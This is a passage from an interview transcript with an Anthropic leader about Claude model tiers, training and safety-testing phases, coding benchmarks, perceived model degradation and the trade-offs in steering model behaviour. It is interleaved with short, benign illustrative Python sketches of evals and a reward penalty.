00:27:10.120 | want to, I want to brainstorm ideas, or I want to do creative writing.
00:27:13.480 | I want the really powerful model.
00:27:15.240 | But then there's a lot of practical applications in a business sense where
00:27:19.120 | it's like, I'm interacting with a website.
00:27:21.280 | I, you know, like I'm like doing my taxes or I'm, you know, talking to, uh, you
00:27:26.640 | know, to like a legal advisor and I want to analyze a contract or, you know, we
00:27:30.840 | have plenty of companies that are just like, you know, I, you know, I want to
00:27:33.680 | do autocomplete on my, on my IDE or something.
00:27:37.000 | Uh, and, and for all of those things, you want to act fast and you want
00:27:40.720 | to use the model very broadly.
00:27:42.200 | So we wanted to serve that whole spectrum of needs.
00:27:46.040 | Um, so we ended up with this, uh, you know, this kind of poetry theme.
00:27:49.960 | And so what's a really short poem.
00:27:51.320 | It's a haiku.
00:27:52.080 | And so haiku is the small, fast, cheap model that is, you know, was at the
00:27:57.160 | time was really surprisingly, surprisingly, uh, intelligent for how
00:28:01.000 | fast and cheap it was, uh, sonnet is a, is a medium sized poem, right.
00:28:05.400 | A couple of paragraphs.
00:28:06.400 | And so Sonnet was the middle model.
00:28:08.000 | It is smarter, but also a little bit slower, a little bit more expensive.
00:28:12.120 | And, and Opus like a magnum Opus is a large work.
00:28:15.320 | Uh, Opus was the, the largest smartest model at the time.
00:28:19.400 | Um, so that, that was the original kind of thinking behind it.
00:28:22.960 | Um, and our, our thinking then was, well, each new generation of models
00:28:28.560 | should shift that trade-off curve.
00:28:30.760 | Uh, so when we released Sonnet 3.5, it has the same, roughly the same, you know,
00:28:36.800 | cost and speed as the Sonnet 3 model.
00:28:41.120 | Uh, but, uh, it, it increased its intelligence to the point where it was
00:28:47.240 | smarter than the original Opus 3 model, uh, especially for code, but,
00:28:51.720 | but also just in general.
00:28:53.240 | And so now, you know, we've shown results for Haiku 3.5, and I believe
00:28:59.360 | Haiku 3.5, the smallest new model, is about as good as Opus 3, the largest old model.
00:29:06.760 | So basically the aim here is to shift the curve.
00:29:09.600 | And then at some point there's going to be an Opus 3.5.
00:29:11.960 | Um, now every new generation of models has its own thing.
00:29:16.240 | They use new data, their personality changes in ways that we kind of, you
00:29:20.840 | know, try to steer, but are not fully able to steer.
00:29:24.240 | And, and so, uh, there's never quite that exact equivalence where the only
00:29:28.280 | thing you're changing is intelligence.
00:29:29.840 | Um, we always try and improve other things and some things change without
00:29:33.360 | us, without us knowing or measuring.
00:29:35.440 | So it's, it's very much an inexact science. In many ways, the manner and
00:29:40.640 | personality of these models is more an art than it is a science.
00:29:43.840 | So what is sort of the reason for, uh, the span of time between say,
00:29:52.080 | uh, Claude Opus 3.0 and 3.5?
00:29:55.800 | What is it, what takes that time if you can speak to it?
00:29:58.400 | Yeah.
00:29:58.640 | So there's, there's different, there's different, uh, processes.
00:30:01.480 | Um, uh, there's pre-training, which is, you know, just kind of the normal
00:30:05.040 | language model training, and that takes a very long time, um, that uses, you
00:30:09.240 | know, these days, you know, tens, you know, tens of thousands, sometimes many
00:30:14.400 | tens of thousands of, uh, GPUs or TPUs or Tranium or, you know, we use different
00:30:20.400 | platforms, but, you know, accelerator chips, um, often, often training for
00:30:25.000 | months, uh, there's then a kind of post-training phase where we do
00:30:30.000 | reinforcement learning from human feedback, as well as other kinds of
00:30:34.120 | reinforcement learning that, that phase is getting, uh, larger and larger now.
00:30:39.280 | And, you know, you know, often that's less of an exact science.
00:30:42.960 | It often takes effort to get it right.
00:30:44.600 | Um, models are then tested with some of our early partners to see how good they
00:30:50.160 | are, and they're then tested both internally and externally for their
00:30:54.760 | safety, particularly for catastrophic and autonomy risks.
00:30:58.400 | Uh, so, uh, we do internal testing according to our responsible scaling
00:31:03.280 | policy, which I, you know, could talk more about that in detail.
00:31:06.200 | And then we have an agreement with the US and the UK AI Safety Institute, as
00:31:11.160 | well as other third-party testers in specific domains to test the models for
00:31:15.920 | what are called CBRN risks, chemical, biological, radiological, and nuclear,
00:31:20.720 | which are, you know, we don't think that models pose these risks seriously yet,
00:31:25.800 | but, but every new model we want to evaluate to see if we're starting to get
00:31:29.040 | close to some of these, these, these more dangerous, um, uh, these
00:31:33.960 | more dangerous capabilities.
00:31:35.440 | So those are the phases.
00:31:37.120 | And then, uh, you know, then, then it just takes some time to get the model
00:31:41.000 | working in terms of inference and launching it in the API.
00:31:44.360 | So there's just a lot of steps to, uh, to actually, to
00:31:48.040 | actually make, you know, model work.
00:31:49.320 | And of course, you know, we're always trying to make the processes
00:31:53.160 | as streamlined as possible, right?
00:31:54.960 | We want our safety testing to be rigorous, but we want it to be
00:31:57.680 | rigorous and to be, you know, to be automatic to happen as fast as it
00:32:02.000 | can without compromising on rigor.
00:32:04.280 | Same with our pre-training process and our post-training process.
00:32:07.720 | So, you know, it's just like building anything else.
00:32:09.840 | It's just like building airplanes.
00:32:11.200 | You want to make them, you know, you want to make them safe, but you
00:32:13.880 | want to make the process streamlined.
00:32:15.640 | And I think the creative tension between those is, is, you know, is an
00:32:18.800 | important thing in making the models work.
00:32:20.360 | Yeah.
00:32:20.840 | A rumor on the street.
00:32:21.920 | I forget who was saying that, uh, Anthropic has really good tooling.
00:32:24.920 | So I, uh, probably a lot of the challenge here is on the software
00:32:29.800 | engineering side is to build the tooling, to, to have a, like a efficient, low
00:32:34.600 | friction interaction with the infrastructure.
00:32:36.320 | You would be surprised how much of the challenges of, uh, you know, building
00:32:41.640 | these models comes down to, you know, software engineering, performance
00:32:46.880 | engineering, you know, you, you, you know, from the outside, you might think,
00:32:50.560 | oh man, we had this Eureka breakthrough, right?
00:32:52.880 | You know, this movie with the science, we discovered it, we figured it out.
00:32:55.760 | But, but I think all things, even, you know,
00:33:00.600 | incredible discoveries, like they, they almost always come
00:33:05.080 | down to the details, um, and often super, super boring details.
00:33:09.080 | I can't speak to whether we have better tooling than, than other companies.
00:33:12.040 | I mean, you know, haven't been at those other companies, at
00:33:14.120 | least, at least not recently.
00:33:15.440 | Um, but it's certainly something we give a lot of attention to.
00:33:18.000 | I don't know if you can say, but from Claude 3 to Claude 3.5,
00:33:23.200 | is there any extra pre-training going on, or do they mostly
00:33:26.680 | focus on the post-training?
00:33:27.720 | There's been leaps in performance.
00:33:29.640 | Yeah, I think, I think at any given stage, we're focused on
00:33:32.800 | improving everything at once.
00:33:34.640 | Um, just, just naturally, like there are different teams.
00:33:37.720 | Each team makes progress in a particular area in, in, in making a particular,
00:33:42.920 | you know, their particular segment of the relay race better.
00:33:45.800 | And it's just natural that when we make a new model, we put, we put
00:33:48.600 | all of these things in at once.
00:33:50.000 | So the data you have, like the preference data you get from RLHF, is that
00:33:55.240 | applicable, is there ways to apply it to newer models as it gets trained up?
00:34:00.560 | Yeah.
00:34:00.920 | Preference data from old models sometimes gets used for new models.
00:34:04.160 | Although of course, uh, it, it performs somewhat better when it's, you know,
00:34:07.640 | trained on, it's trained on the new models.
00:34:09.480 | Note that we have this, you know, constitutional AI method such that
00:34:12.800 | we don't only use preference data.
00:34:14.320 | We kind of, there's also a post-training process where we
00:34:17.040 | train the model against itself.
00:34:18.600 | And there's, you know, new types of post-training the model against
00:34:21.880 | itself that are used every day.
00:34:23.200 | So it's not just RLHF, it's a bunch of other methods as well.
00:34:26.680 | Um, post-training, I think, you know, is becoming more and more sophisticated.
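(A rough sketch of the "train the model against itself" / constitutional AI idea mentioned here. The `generate` stub, prompts, and principle text are placeholders, not Anthropic's actual pipeline; the published recipe additionally trains a preference model on such AI-generated comparisons and uses it for reinforcement learning.)

```python
# Toy outline of the critique-and-revise step that turns a model's own outputs
# into training data, with no human preference labels in this part of the loop.
def generate(prompt: str) -> str:
    return f"<model output for: {prompt[:40]}...>"   # placeholder for a real LM call

CONSTITUTION = [
    "Choose the response that is most helpful, honest, and harmless.",
]

def critique_and_revise(user_prompt: str) -> tuple[str, str]:
    original = generate(user_prompt)
    principle = CONSTITUTION[0]
    critique = generate(
        f"Critique this response against the principle '{principle}':\n{original}"
    )
    revised = generate(
        f"Revise the response to address the critique.\n"
        f"Response: {original}\nCritique: {critique}"
    )
    return original, revised   # (rejected, preferred) pair for later training

pairs = [critique_and_revise("How should I store API keys in a small project?")]
```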
00:34:30.440 | Well, what explains the big leap in performance for the new Sonnet 3.5?
00:34:34.840 | I mean, at least in the programming side, and maybe this is a good
00:34:37.760 | place to talk about benchmarks.
00:34:39.080 | What does it mean to get better?
00:34:40.520 | Just the number went up, but you know, I, I, I program, but I also love
00:34:46.000 | programming and I, um, Claude 3.5 through Cursor is what I use, uh, to assist me
00:34:52.400 | in programming and there was, at least experientially, anecdotally, it's
00:34:57.560 | gotten smarter at programming.
00:35:00.280 | So what, like, what, what does it take to get it, uh, to get it smarter?
00:35:03.520 | We observed that as well, by the way, there were a couple of very strong
00:35:07.400 | engineers here at Anthropic, um, who all previous code models, both produced
00:35:12.200 | by us and produced by all the other companies, hadn't really been useful
00:35:15.840 | to, hadn't really been useful to them.
00:35:17.560 | You know, they said, you know, maybe, maybe this is useful to beginner.
00:35:20.040 | It's not useful to me, but Sonnet 3.5, the original one for the first time,
00:35:25.080 | they said, oh my God, this helped me with something that, you know, that
00:35:27.880 | it would have taken me hours to do.
00:35:29.160 | This is the first model has actually saved me time.
00:35:31.280 | So again, the waterline is rising.
00:35:33.400 | And, and then I think, you know, the new Sonnet has been, has been even better
00:35:36.960 | in terms of what it, what it takes.
00:35:38.640 | I mean, I'll just say it's been across the board.
00:35:41.160 | It's in the pre-training, it's in the post-training, it's in
00:35:44.800 | various evaluations that we do.
00:35:46.880 | We've observed this as well.
00:35:48.600 | And if we go into the details of the benchmark, so SWE-bench is basically,
00:35:53.680 | you know, since you're a programmer, you know,
00:35:56.960 | you'll be familiar with like pull requests, and, you know, pull
00:36:01.560 | requests are like a sort of atomic unit of work.
00:36:06.520 | You know, you could say, I'm, you know, I'm implementing one,
00:36:08.680 | I'm implementing one thing.
00:36:10.400 | And, and so SWE Bench actually gives you kind of a real world situation where the
00:36:16.680 | code base is in the current state.
00:36:18.160 | And I'm trying to implement something that's, you know, that's
00:36:20.800 | described in, described in language.
00:36:22.800 | We have internal benchmarks where we, where we measure the same thing.
00:36:25.800 | And you say, just give the model free reign to like, you know, do anything,
00:36:29.880 | run, run, run anything, edit anything.
00:36:32.440 | How, how well is it able to complete these tasks?
00:36:36.040 | And it's that benchmark that's gone from, it can do it 3% of the time to,
00:36:40.480 | it can do it about 50% of the time.
00:36:42.320 | So I actually do believe that, you know, you can game benchmarks, but I think if
00:36:46.840 | we get to a hundred percent on that benchmark and in a way that isn't kind
00:36:50.120 | of like over-trained or, or gamed for that particular benchmark, it probably
00:36:54.640 | represents a real and serious increase in kind of, in kind of programming,
00:36:59.320 | programming ability, and, and I would suspect that if we can get to, you know,
00:37:03.720 | 90, 90, 95%, that, that, that, you know, it will, it will represent ability
00:37:09.160 | to autonomously do a significant fraction of software engineering tasks.
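(A minimal sketch of what a SWE-bench-style number like "3% to 50%" measures; the field names and helpers below are placeholders, not the actual harness. Each task is a real repository snapshot plus an issue written in natural language; the model proposes a patch, the repo's held-out tests decide pass/fail, and the headline score is simply the fraction of tasks resolved.)

```python
from dataclasses import dataclass
from typing import Callable

@dataclass
class Task:
    repo_snapshot: str                          # checkout of the repo at issue time
    issue_text: str                             # natural-language description of the fix
    passes_hidden_tests: Callable[[str], bool]  # run held-out tests on the patched repo

def resolved_rate(propose_patch: Callable[[str, str], str], tasks: list[Task]) -> float:
    """Score = fraction of tasks whose held-out tests pass after applying the model's patch."""
    resolved = sum(
        task.passes_hidden_tests(propose_patch(task.repo_snapshot, task.issue_text))
        for task in tasks
    )
    return resolved / len(tasks)

# e.g. resolved_rate(my_agent, tasks) going from ~0.03 to ~0.50 over the year described above.
```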
00:37:12.680 | Well, ridiculous timeline question.
00:37:15.520 | When is Claude Opus 3.5 coming out?
00:37:19.320 | Uh, not giving you an exact date, uh, but you know, there, there, uh, you
00:37:24.080 | know, as far as we know, the plan is still to have a Claude 3.5 Opus.
00:37:27.480 | Are we going to get it before GTA 6 or no?
00:37:30.360 | Like Duke Nukem forever.
00:37:31.760 | So what was that game that there was some game that was delayed 15 years.
00:37:34.720 | Was that Duke Nukem forever?
00:37:35.960 | Yeah.
00:37:36.320 | And I think GTA is now just releasing trailers.
00:37:39.000 | It, you know, it's only been three months since we released the first Sonnet.
00:37:41.840 | Yeah.
00:37:42.760 | It's incredible.
00:37:43.320 | The incredible pace of release.
00:37:44.640 | It just, it just tells you about the pace, the expectations for
00:37:47.680 | when things are going to come out.
00:37:49.040 | So, uh, what about 4.0?
00:37:51.720 | So how do you think about sort of, as these models get bigger
00:37:55.280 | and bigger about versioning?
00:37:56.520 | And also just versioning in general, why is it Sonnet 3.5 updated with the date?
00:38:02.840 | Why not Sonnet 3.6, which a lot of people are calling it?
00:38:06.640 | Naming is actually an interesting challenge here, right?
00:38:09.120 | Because I think a year ago, most of the model was pre-training.
00:38:12.600 | And so you could start from the beginning and just say, okay, we're
00:38:15.600 | going to have models of different sizes.
00:38:17.040 | We're going to train them all together.
00:38:18.280 | And, you know, we'll have a family of naming schemes and then we'll
00:38:21.760 | put some new magic into them.
00:38:23.200 | And then, you know, we'll have the next, the next generation.
00:38:26.080 | Um, the trouble starts already when some of them take a lot
00:38:28.920 | longer than others to train, right?
00:38:30.320 | That already messes up your time, time a little bit, but as you make big
00:38:35.000 | improvements in, as you make big improvements in pre-training, uh, then
00:38:39.040 | you suddenly notice, oh, I can make better pre-trained model and that
00:38:42.640 | doesn't take very long to do.
00:38:44.680 | And, but, you know, clearly it has the same, you know, size
00:38:47.520 | and shape of previous models.
00:38:48.840 | Uh, so I think those two together, as well as the timing issues,
00:38:53.520 | any kind of scheme you come up with, uh, you know, the reality tends to
00:38:59.400 | kind of frustrate that scheme, right?
00:39:00.960 | It tends to kind of break out of the scheme.
00:39:04.200 | It's not like software where you can say, oh, this is like, you
00:39:07.040 | know, 3.7, this is 3.8.
00:39:09.080 | No, you have models with different, different trade-offs.
00:39:12.120 | You can change some things in your models.
00:39:14.040 | You can train, you can change other things.
00:39:16.200 | Some are faster and slower in inference.
00:39:18.240 | Some have to be more expensive.
00:39:19.520 | Some have to be less expensive.
00:39:20.960 | And so I think all the companies have struggled with this.
00:39:23.800 | Um, I think we did very, you know, I think, think we were in a good, good
00:39:28.280 | position in terms of naming when we had Haiku, Sonnet and Opus.
00:39:32.040 | We're trying to maintain it, but it's not, it's not, it's not perfect.
00:39:35.880 | Um, so we'll, we'll, we'll try and get back to the simplicity, but it, it,
00:39:39.600 | um, uh, just the, the, the nature of the field, I feel like no one's figured out
00:39:44.480 | naming, it's somehow a different paradigm from like normal software.
00:39:48.240 | And, and, and so we, we just, none of the companies have been perfect at it.
00:39:52.880 | Um, it's something we struggle with surprisingly much relative to, you know,
00:39:56.960 | how, relative to how trivial it is, you know, for the, the, the, the grand
00:40:01.600 | science of training the models.
00:40:02.840 | So from the user side, the user experience of the updated Sonnet 3.5
00:40:08.400 | is just different than the previous, uh, June, 2024 Sonnet 3.5.
00:40:13.560 | It would be nice to come up with some kind of labeling that embodies that
00:40:17.520 | because people talk about Sonnet 3.5, but now there's a different one.
00:40:22.160 | And so how do you refer to the previous one and the new one?
00:40:24.800 | And it, it, uh, when there's a distinct improvement, it just makes
00:40:30.120 | conversation about it, uh, just challenging.
00:40:34.160 | Yeah.
00:40:34.800 | Yeah, I, I definitely think this question of, there are lots of
00:40:38.640 | properties of the models that are not reflected in the benchmarks.
00:40:42.320 | Um, I, I think, I think that's, that's definitely the case and everyone
00:40:46.200 | agrees and not all of them are capabilities.
00:40:48.320 | Some of them are, you know, models can be polite or brusque.
00:40:53.840 | They can be, uh, you know, uh, very reactive or they can ask you questions.
00:41:00.520 | Um, they can have what, what feels like a warm personality or a cold
00:41:04.480 | personality, they can be boring or they can be very distinctive
00:41:07.800 | like GoldenGate Claude was.
00:41:09.320 | Um, and we have a whole, you know, we have a whole team kind of focused on,
00:41:13.880 | I think we call it Claude character.
00:41:15.480 | Uh, Amanda leads that team and we'll, we'll talk to you about that, but
00:41:19.440 | it's still a very inexact science.
00:41:21.520 | Um, and, and often we find that models have properties that we're not aware of.
00:41:26.680 | The, the fact of the matter is that you can, you know, talk to a model
00:41:30.680 | 10,000 times, and there are some behaviors you might not see.
00:41:34.360 | Uh, just like, just like with a human, right.
00:41:36.640 | I can know someone for a few months and, you know, not know that they have a
00:41:39.680 | certain skill or not know that there's a certain side to them.
00:41:42.720 | And so I think, I think we just have to get used to this idea and we're always
00:41:46.120 | looking for better ways of testing our models to, to demonstrate these
00:41:50.520 | capabilities and, and, and also to decide which are, which are the, which
00:41:54.080 | are the personality properties we want models to have in which we don't want
00:41:58.200 | to have that itself, the normative question is also super interesting.
00:42:02.240 | I got to ask you a question from Reddit, from Reddit.
00:42:04.680 | Oh boy.
00:42:05.760 | You know, there's this fascinating, to me at least,
00:42:09.640 | psychological, social phenomenon where people report that Claude has
00:42:15.080 | gotten dumber for them over time.
00:42:17.040 | And so the question is, does the user complaint about the
00:42:21.000 | dumbing down of Claude 3.5 Sonnet hold any water?
00:42:23.920 | So are these anecdotal reports a kind of social phenomenon, or are
00:42:31.320 | there any cases where Claude would actually get dumber?
00:42:33.040 | So, uh, this actually doesn't apply.
00:42:35.840 | This, this isn't just about Claude.
00:42:37.480 | I believe this, I believe I've seen these complaints for every foundation
00:42:42.880 | model produced by a major company.
00:42:44.480 | Um, people said this about GPT-4, they said it about GPT-4 turbo.
00:42:48.520 | Um, so, so, so a couple of things.
00:42:51.600 | Um, one, the actual weights of the model, right?
00:42:54.600 | The actual brain of the model that does not change unless
00:42:58.240 | we introduce a new model.
00:43:00.040 | Um, there, there are just a number of reasons why it would not make
00:43:03.360 | sense practically to be randomly substituting in, substituting
00:43:07.240 | in new versions of the model.
00:43:09.000 | It's difficult from an inference perspective, and it's actually
00:43:12.000 | hard to control all the consequences of changing the weights of the model.
00:43:16.000 | Let's say you wanted to fine tune the model to be like, I don't know,
00:43:19.360 | to like, to say certainly less, which, you know, an old version
00:43:22.760 | of Sonnet used to do, um, you actually end up changing a hundred things as well.
00:43:26.320 | So we have a whole process for it.
00:43:27.840 | And we have a whole process for modifying the model.
00:43:30.560 | We do a bunch of testing on it.
00:43:31.960 | We do a bunch of, um, like we do a bunch of user testing and early customers.
00:43:36.080 | So it, it, we both have never changed the weights of the model
00:43:40.040 | without, without telling anyone.
00:43:41.560 | And it, it, it wouldn't certainly in the current setup, it
00:43:45.080 | would not make sense to do that.
00:43:46.480 | Now, there are a couple of things that we do occasionally do.
00:43:49.480 | Um, one is sometimes we run A/B tests.
00:43:52.720 | Um, but those are typically very close to when a model is being, is being, uh,
00:43:57.440 | released and for a very small fraction of time.
00:44:00.280 | Um, so, uh, you know, like the, you know, the, the day before the new Sonnet 3.5.
00:44:05.480 | I agree.
00:44:06.440 | We should have had a better name.
00:44:07.960 | It's clunky to refer to it.
00:44:09.400 | There were some comments from people that it's
00:44:13.040 | gotten a lot better, and that's because a fraction were exposed
00:44:15.920 | to an A/B test for those one or two days.
00:44:20.160 | The other is that occasionally the system prompt will change, and the
00:44:24.400 | system prompt can have some effects, although it's unlikely to dumb
00:44:29.040 | down models, it's unlikely to make them dumber.
00:44:31.320 | And we've seen that while these two things, which I'm
00:44:35.560 | listing to be very complete, happen quite infrequently,
00:44:41.280 | the complaints, for us and for other model companies, that the model
00:44:46.800 | changed, the model isn't good at this,
00:44:48.480 | the model got more censored,
00:44:49.720 | the model was dumbed down,
00:44:50.800 | those complaints are constant.
00:44:52.440 | And so I don't want to say people are imagining it or anything, but the
00:44:56.560 | models are for the most part not changing.
00:44:59.600 | If I were to offer a theory, I think it actually relates to one of the
00:45:05.320 | things I said before, which is that
00:45:07.480 | models are very complex and have many aspects to them.
00:45:12.120 | And so often, if I ask the model a question,
00:45:16.640 | if I say "do task X" versus "can you do task X," the model
00:45:22.120 | might respond in different ways.
00:45:23.840 | And so there are all kinds of subtle things that you can change about
00:45:28.680 | the way you interact with the model that can give you very different results.
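A minimal sketch of how the phrasing sensitivity described above could be probed empirically. This is illustrative only and is not Anthropic's methodology: the generate callable is a stand-in for whatever text-generation API you have access to, and the toy model at the bottom exists only so the sketch runs on its own.

```python
# Minimal sketch: probe how sensitive a chat model is to small changes in
# prompt phrasing. `generate` is a placeholder for any text-generation call
# you have available; it is NOT a real Anthropic API signature.
from collections import Counter
from typing import Callable

def phrasing_probe(generate: Callable[[str], str], task: str, n_samples: int = 20):
    """Compare responses to an imperative vs. a question form of the same task."""
    phrasings = {
        "imperative": f"{task}.",                  # "Summarize this article."
        "question":   f"Can you {task.lower()}?",  # "Can you summarize this article?"
    }
    results = {}
    for label, prompt in phrasings.items():
        # Bucket responses by a crude signature (first word) just to show drift;
        # a real probe would use task-specific scoring instead.
        first_words = Counter()
        for _ in range(n_samples):
            reply = generate(prompt)
            first_words[reply.split()[0].lower() if reply.split() else ""] += 1
        results[label] = first_words
    return results

if __name__ == "__main__":
    # Toy stand-in model so the sketch runs without network access.
    import random
    def toy_generate(prompt: str) -> str:
        openers = ["Certainly,", "Sure,", "Here", "I"] if prompt.endswith("?") else ["Here", "Summary:"]
        return random.choice(openers) + " ..."
    print(phrasing_probe(toy_generate, "Summarize this article"))
```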
00:45:32.280 | Um, to be clear, this, this itself is like a failing by, by us and by the
00:45:37.240 | other model providers that, that the models are, are just, just often sensitive
00:45:40.960 | to like small, small changes in wording.
00:45:43.400 | It's yet another way in which the science of how these models
00:45:46.640 | work is very poorly developed.
00:45:48.280 | Uh, and, and so, you know, if I go to sleep one night and I was like talking to
00:45:51.760 | the model in a certain way and I like slightly change the phrasing of how I
00:45:55.400 | talk to the model, you know, I could, I could get different results.
00:45:58.600 | So that's, that's one possible way.
00:46:00.680 | The other thing is, man, it's just hard to quantify this stuff.
00:46:03.480 | It's hard to quantify.
00:46:05.440 | I think people are very excited by new models when they come out.
00:46:08.400 | And then as time goes on, they become
00:46:12.520 | very aware of the limitations.
00:46:13.760 | So that may be another effect, but that's all a very long-winded
00:46:16.600 | way of saying that for the most part, with some fairly narrow
00:46:20.040 | exceptions, the models are not changing.
00:46:22.440 | I think there is a psychological effect.
00:46:24.360 | You just start getting used to it.
00:46:25.880 | The baseline rises. Like when people first got wifi on
00:46:29.400 | airplanes, it's like amazing magic.
00:46:32.120 | Yeah.
00:46:32.400 | And then, and then you start getting this thing to work.
00:46:34.800 | This is such a piece of crap.
00:46:36.640 | Exactly.
00:46:37.480 | So then it's easy to have the conspiracy theory of they're
00:46:39.640 | making wifi slower and slower.
00:46:41.280 | This is probably something I'll talk to Amanda much more about,
00:46:44.680 | but, um, another Reddit question.
00:46:46.880 | When will Claude stop trying to be my puritanical
00:46:51.240 | grandmother, imposing its moral worldview on me as a paying customer?
00:46:55.400 | And also, what is the psychology behind making Claude overly apologetic?
00:46:59.080 | So these are reports about the experience, a different
00:47:04.200 | angle on the frustration.
00:47:05.160 | It has to do with the character.
00:47:06.080 | Yeah.
00:47:06.360 | So a couple of points on this first one is, um, like things that
00:47:11.040 | people say on Reddit and Twitter or X or whatever it is, um, there's
00:47:15.120 | actually a huge distribution shift between like the stuff that people
00:47:18.640 | complain loudly about on social media.
00:47:20.480 | And what actually kind of like, you know, Statistically users care about.
00:47:24.960 | And that drives people to use the models.
00:47:26.560 | Like people are frustrated with, you know, things like, you know, the
00:47:30.000 | model, not writing out all the code or the model, uh, you know, just,
00:47:34.240 | just not being as good at code as it could be, even though it's the
00:47:37.120 | best model in the world on code.
00:47:38.880 | I think the majority of things are about that.
00:47:41.880 | But certainly a kind of vocal minority
00:47:48.080 | have raised these concerns, right?
00:47:50.320 | They're frustrated by the model refusing things that it shouldn't refuse
00:47:53.960 | or apologizing too much, or just having these kind
00:47:57.080 | of annoying verbal tics.
00:47:58.800 | The second caveat, and I just want to say this super clearly,
00:48:02.480 | because I think some people don't know it, others kind
00:48:07.120 | of know it but forget it:
00:48:08.320 | it is very difficult to control, across the board, how the models behave.
00:48:13.200 | You cannot just reach in there and say, oh, I want the model to apologize
00:48:17.920 | less. I mean, you can do that,
00:48:19.360 | you can include training data that says the model should apologize
00:48:23.240 | less, but then in some other situation they end up being super rude or
00:48:27.640 | overconfident in a way that's misleading people.
00:48:30.280 | So there, there are all these trade-offs.
00:48:32.320 | Um, uh, for example, another thing is if there was a period during
00:48:36.880 | which models, ours, and I think others as well, were too verbose, right?
00:48:41.720 | They would like repeat themselves.
00:48:43.040 | They would say too much.
00:48:44.120 | Um, you can cut down on the verbosity by penalizing the models
00:48:48.320 | for, for just talking for too long.
00:48:50.160 | What happens when you do that, if you do it in a crude way is when the models
00:48:54.520 | are coding, sometimes they'll say, rest of the code goes here, right?
00:48:58.400 | Because they've learned that that's the way to economize and that they see it.
00:49:01.360 | And then, and then, so that leads the model to be so-called lazy in coding,
00:49:05.160 | where they, where they, where they're just like, ah, you can finish the rest of it.
00:49:08.160 | It's not because we want to save on compute, or
00:49:12.080 | because the models are lazy
00:49:14.000 | during winter break, or any of the other conspiracy
00:49:17.760 | theories that have come up. It's just
00:49:21.040 | very hard to control the behavior of the model, to steer the behavior of the
00:49:25.400 | model in all circumstances at once.
00:49:27.760 | You can kind of, there's this, this whack-a-mole aspect where you push on
00:49:31.680 | one thing and like, you know, these, these, these, you know, these other
00:49:37.040 | things start to move as well that you may not even notice or measure.
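A minimal sketch of the kind of crude verbosity penalty described above. This is illustrative only, not Anthropic's actual reward model or training objective; it just shows numerically why, if length alone is penalized, a model that elides work ("rest of the code goes here") can come out ahead.

```python
# Minimal sketch of a crude length penalty of the kind described above.
# Illustrative only, not Anthropic's actual training objective: if the only
# pressure against verbosity is "shorter is better", a model can score well
# by truncating its work ("# rest of the code goes here").
def crude_reward(task_score: float, num_tokens: int,
                 token_budget: int = 400, penalty_per_token: float = 0.01) -> float:
    """Task quality minus a penalty for every token past the budget."""
    overage = max(0, num_tokens - token_budget)
    return task_score - penalty_per_token * overage

# Two hypothetical completions for the same coding request:
full_solution = {"task_score": 1.0, "num_tokens": 900}   # complete but long
lazy_solution = {"task_score": 0.7, "num_tokens": 250}   # "rest of the code goes here"

print(crude_reward(**full_solution))  # 1.0 - 0.01 * 500 = -4.0
print(crude_reward(**lazy_solution))  # 0.7 - 0.01 * 0   =  0.7  -> laziness wins
```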
00:49:40.160 | And so one of the reasons that I, that I care so much about, you know,
00:49:45.920 | kind of grand alignment of these AI systems in the future is actually,
00:49:49.520 | these systems are actually quite unpredictable.
00:49:51.880 | They're actually quite hard to steer and control.
00:49:54.400 | And this version we're seeing today of you make one thing better,
00:50:00.200 | it makes another thing worse.
00:50:01.680 | I think that's a present-day analog of future control
00:50:08.760 | problems in AI systems that we can start to study today, right?
00:50:12.200 | I think that difficulty in steering the behavior,
00:50:18.720 | and in making sure that if we push an AI system in one direction, it doesn't
00:50:23.040 | push it in another direction in some other ways that we didn't want,
00:50:26.720 | I think that's kind of
00:50:29.840 | an early sign of things to come.
00:50:32.120 | And if we can do a good job of solving this problem, right.
00:50:35.040 | Of like you asked the model to like, you know, to like make and distribute
00:50:39.440 | smallpox and it says no, but it's willing to like help you in your
00:50:43.080 | graduate level virology class.
00:50:44.720 | Like, how do we get both of those things at once?
00:50:47.360 | It's hard.
00:50:48.200 | It's very easy to go to one side or the other, and it's
00:50:51.240 | a multidimensional problem.
00:50:52.600 | And so, uh, I, you know, I think these questions of like
00:50:56.080 | shaping the models personality.
00:50:57.960 | I think they're very hard.
00:50:59.760 | I think we haven't done perfectly on them.
00:51:02.440 | I think we've actually done the best of all the AI companies,
00:51:05.400 | but still so far from perfect.
00:51:08.000 | Uh, and I think if we can get this right, if we can control the, the, you
00:51:13.040 | know, control the false positives and false negatives in this, this very
00:51:17.640 | kind of controlled present day environment, we'll be much better
00:51:21.560 | at doing it for the future when our worry is, you know, will the
00:51:24.400 | models be super autonomous?
00:51:26.000 | Will they be able to, you know, make very dangerous things?
00:51:29.320 | Will they be able to autonomously, you know, build whole companies
00:51:32.080 | and are those companies aligned?
00:51:33.480 | So, so I, I think of this, this present task as both vexing, but
00:51:38.120 | also good practice for the future.
00:51:39.520 | What's the current best way of gathering sort of user feedback, like, uh, not
00:51:45.960 | anecdotal data, but just large scale data about pain points or the opposite
00:51:51.720 | of pain points, positive things.
00:51:53.120 | So on, is it internal testing?
00:51:54.720 | Is it a specific group testing, A/B testing?
00:51:57.640 | What, what works?
00:51:58.640 | So typically we'll have internal model bashings
00:52:01.920 | where all of Anthropic,
00:52:03.040 | and Anthropic is almost a thousand people,
00:52:04.760 | people just try and break the model.
00:52:07.320 | They try and interact with it in various ways.
00:52:09.440 | We have a suite of evals for, you know, is the model
00:52:14.480 | refusing in ways that it shouldn't? I think we even had a "certainly"
00:52:18.120 | eval, because one of our earlier models had this problem
00:52:23.080 | where it had this annoying tic where it would respond to a wide
00:52:26.480 | range of questions by saying, certainly, I can help you with that.
00:52:29.440 | Certainly.
00:52:30.360 | I would be happy to do that.
00:52:31.520 | Certainly, this is correct.
00:52:33.280 | And so we had a "certainly" eval, which is, how
00:52:37.200 | often does the model say "certainly"?
00:52:38.800 | But look, this is just whack-a-mole. Like, what if it
00:52:42.680 | switches from "certainly" to "definitely"? So, you know, every time
00:52:47.880 | we add a new eval, and we're always evaluating for all the old things.
00:52:50.920 | So we have hundreds of these evaluations, but we find that there's no substitute
00:52:55.040 | for a human interacting with it.
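A minimal sketch of what a "certainly"-style tic eval could look like, assuming you already have a batch of model transcripts to score. This is not Anthropic's actual eval harness; the added "definitely" pattern just illustrates the whack-a-mole point about re-running every old check on every new model.

```python
# Minimal sketch of a "certainly"-style tic eval, not Anthropic's actual
# eval harness. It counts how often responses contain a canned filler phrase,
# and illustrates the whack-a-mole point: you keep adding phrases
# ("definitely", ...) and keep running every old eval on every new model.
import re

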